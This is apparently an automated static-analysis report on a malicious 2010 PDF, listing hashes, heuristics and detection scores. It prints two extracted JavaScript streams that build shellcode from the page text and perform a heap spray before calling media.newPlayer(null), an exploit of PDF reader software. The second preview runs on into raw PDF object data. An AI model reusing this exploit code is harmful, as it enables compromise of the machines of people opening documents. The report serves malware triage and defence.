Malicious PDF — malware analysis report

Static analysis result for SHA-256 2ee76409fcb1d418…

MALICIOUS

PDF

1.24 MB Created: 2010-07-28 14:49:23 Authoring application: Scribus 1.3.3.14 (via Scribus PDF Library 1.3.3.14) First seen: 2026-05-10
MD5: 4e9df4c856abbf64b936498c27940c99 SHA-1: 60b685f941b9d3deb17142fd63fa892ec405a8c2 SHA-256: 2ee76409fcb1d4187974b6aec5f1ef972611f573c06b26e7834d92a0c5724fe8
118 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript stream, named 'javascript_obj0055_001.js', is obfuscated and uses String.fromCharCode, suggesting it is designed to download and execute a second-stage payload. While the specific payload or its destination is not directly discernible from the static analysis, the presence of obfuscated JavaScript is a strong indicator of malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9876

Heuristics 5

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    var Wo = educ(shell);
var yR = educ(String.fromCharCode(37,117,51,55,50,55,37,117,50,55,102,53));
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.monotype.comMonotype In PDF document text
    • http://ocsp.verisign.com/ocsp/status0In PDF document text
    • https://www.verisign.com/rpa0In PDF document text
    • http://www.monotype.com/html/mtname/ms_timesnewroman.htmlhttp://www.monotype.com/html/mtname/ms_welcome.htmlhttp://www.monotype.com/html/type/license.htmlIn PDF document text
    • https://www.verisign.com/rpaIn PDF document text
    • http://crl.microsoft.com/pki/crl/products/CodeSignPCA.crl0In PDF document text
    • http://www.microsoft.com/typographyIn PDF document text
    • http://www.iec.chIn PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0055_001.js pdf-javascript-stream PDF /JS object 55 at offset 0x13DBAE 1756 bytes
SHA-256: 116d8dca9cf9d5d6a317a894daceafbd850845d5bfe8fa229e0a9f62ec102055
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 7 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function educ(s) {

}



function New_Script()
{
var ckWord, numWords;
var text = '';

for (var i = 0; i < this.numPages; i++ ) 
{
numWords = this.getPageNumWords(i);
for (var j = 0; j < numWords; j++) 
{
ckWord = this.getPageNthWord(i, j);
text = text + ckWord.toString();
}
}

text = text + ' ';


var k = 1;
var b=0;
var shell = '';
var shell_1 = '';
var shell_2 = '';
var u_shell = '';
var pos = 0;
while (pos < (text.length-1)) {
 pos += k;
 if(!b)
 {
	b = 1;
	if (pos < text.length)
	{ shell_1 = shell_1 + text[pos] + text[pos+1]; pos+=2; }
	else 
	{ shell_1 = shell_1 + text[pos]; pos+=1; }
 }
 else
 {
	b = 0;
	if (pos < text.length)
	{ shell_2 = shell_2 + text[pos] + text[pos+1]; pos+=2; }
	else 
	{ shell_2 = shell_2 + text[pos]; pos+=1; }
	
	u_shell = '%u'+shell_2+shell_1;
	shell_1 = '';
	shell_2 = '';
	shell += u_shell;
 }
 k++;
 if (k>3) k = 1;
}

var Wo = educ(shell);
var yR = educ(String.fromCharCode(37,117,51,55,50,55,37,117,50,55,102,53));

for(i=0;i<15;){yR+=yR;i ++;}
yR=yR.substring(0,32768 - Wo.length);

memory=new Array();

for(i=0;i<0x2000;) {
	memory[i]= yR + Wo; i ++;
}

util[String.fromCharCode(112,114,105,110,116,100)](String.fromCharCode(49,46,51,52,53,54,55,56,57,48,49,46,51,52,53,54,55,56,57,48,49,46,51,52,53,54,32,58,32,49,46,51,49,46,51,52), new Date());
util[String.fromCharCode(112,114,105,110,116,100)](String.fromCharCode(49,46,51,52,53,54,55,56,57,48,49,46,51,52,53,54,55,56,57,48,49,46,51,52,53,54,32,58,32,49,46,51,49,46,51,52), new Date());
try {var obj = this.media;obj['new'+'Player'](null);} catch(e) {}
util[String.fromCharCode(112,114,105,110,116,100)](String.fromCharCode(49,46,51,52,53,54,55,56,57,48,49,46,51,52,53,54,55,56,57,48,49,46,51,52,53,54,32,58,32,49,46,51,49,46,51,52), new Date());


}
javascript_obj0055_002.js pdf-javascript-stream PDF /JS object 55 at offset 0x13DBD1 3249 bytes
SHA-256: b4c035f2d20427887446b2d6603f989fac5e833a29bf27d356316d16d7662ee5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 7 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function educ(s) {

}



function New_Script()
{
var ckWord, numWords;
var text = '';

for (var i = 0; i < this.numPages; i++ ) 
{
numWords = this.getPageNumWords(i);
for (var j = 0; j < numWords; j++) 
{
ckWord = this.getPageNthWord(i, j);
text = text + ckWord.toString();
}
}

text = text + ' ';


var k = 1;
var b=0;
var shell = '';
var shell_1 = '';
var shell_2 = '';
var u_shell = '';
var pos = 0;
while (pos < (text.length-1)) {
 pos += k;
 if(!b)
 {
	b = 1;
	if (pos < text.length)
	{ shell_1 = shell_1 + text[pos] + text[pos+1]; pos+=2; }
	else 
	{ shell_1 = shell_1 + text[pos]; pos+=1; }
 }
 else
 {
	b = 0;
	if (pos < text.length)
	{ shell_2 = shell_2 + text[pos] + text[pos+1]; pos+=2; }
	else 
	{ shell_2 = shell_2 + text[pos]; pos+=1; }
	
	u_shell = '%u'+shell_2+shell_1;
	shell_1 = '';
	shell_2 = '';
	shell += u_shell;
 }
 k++;
 if (k>3) k = 1;
}

var Wo = educ(shell);
var yR = educ(String.fromCharCode(37,117,51,55,50,55,37,117,50,55,102,53));

for(i=0;i<15;){yR+=yR;i ++;}
yR=yR.substring(0,32768 - Wo.length);

memory=new Array();

for(i=0;i<0x2000;) {
	memory[i]= yR + Wo; i ++;
}

util[String.fromCharCode(112,114,105,110,116,100)](String.fromCharCode(49,46,51,52,53,54,55,56,57,48,49,46,51,52,53,54,55,56,57,48,49,46,51,52,53,54,32,58,32,49,46,51,49,46,51,52), new Date());
util[String.fromCharCode(112,114,105,110,116,100)](String.fromCharCode(49,46,51,52,53,54,55,56,57,48,49,46,51,52,53,54,55,56,57,48,49,46,51,52,53,54,32,58,32,49,46,51,49,46,51,52), new Date());
try {var obj = this.media;obj['new'+'Player'](null);} catch(e) {}
util[String.fromCharCode(112,114,105,110,116,100)](String.fromCharCode(49,46,51,52,53,54,55,56,57,48,49,46,51,52,53,54,55,56,57,48,49,46,51,52,53,54,32,58,32,49,46,51,49,46,51,52), new Date());


}
endstream
endobj
56 0 obj
<< /S /JavaScript /JS 55 0 R >>
endobj
57 0 obj
<< /Names [ (New_Script) 56 0 R ] >>
endobj
7 0 obj
<< /JavaScript 57 0 R >>
endobj
8 0 obj
[]
endobj
xref
0 58
0000000000 65535 f 
0000000015 00000 n 
0000000266 00000 n 
0001301237 00000 n 
0001301283 00000 n 
0001301367 00000 n 
0001301388 00000 n 
0001303332 00000 n 
0001303372 00000 n 
0000000467 00000 n 
0000001848 00000 n 
0000411199 00000 n 
0000411422 00000 n 
0000412403 00000 n 
0000414242 00000 n 
0000417312 00000 n 
0000417507 00000 n 
0000418497 00000 n 
0000420636 00000 n 
0000423742 00000 n 
0000423937 00000 n 
0000424927 00000 n 
0000427257 00000 n 
0000430375 00000 n 
0000430570 00000 n 
0000431409 00000 n 
0000433138 00000 n 
0000435390 00000 n 
0000435585 00000 n 
0000436377 00000 n 
0000437824 00000 n 
0000439728 00000 n 
0000439923 00000 n 
0000440749 00000 n 
0000443111 00000 n 
0000445771 00000 n 
0000445966 00000 n 
0000446744 00000 n 
0000448072 00000 n 
0000449904 00000 n 
0000450099 00000 n 
0000450456 00000 n 
0000451125 00000 n 
0000452259 00000 n 
0000452454 00000 n 
0000453370 00000 n 
0000454829 00000 n 
0000961731 00000 n 
0000962195 00000 n 
0000962249 00000 n 
0000962409 00000 n 
0000962560 00000 n 
0001300754 00000 n 
0001300808 00000 n 
0001300987 00000 n 
0001301422 00000 n 
0001303231 00000 n 
0001303279 00000 n 
trailer
<<
/Size 58
/Root 1 0 R
/Info 2 0 R
/ID [<697D1C20E25187BC352F1C13D043A47C><697D1C20E25187BC352F1C13D043A47C>]
>>
startxref
1303390
%%EOF

Open this report in the interactive analyzer, or submit your own file for analysis.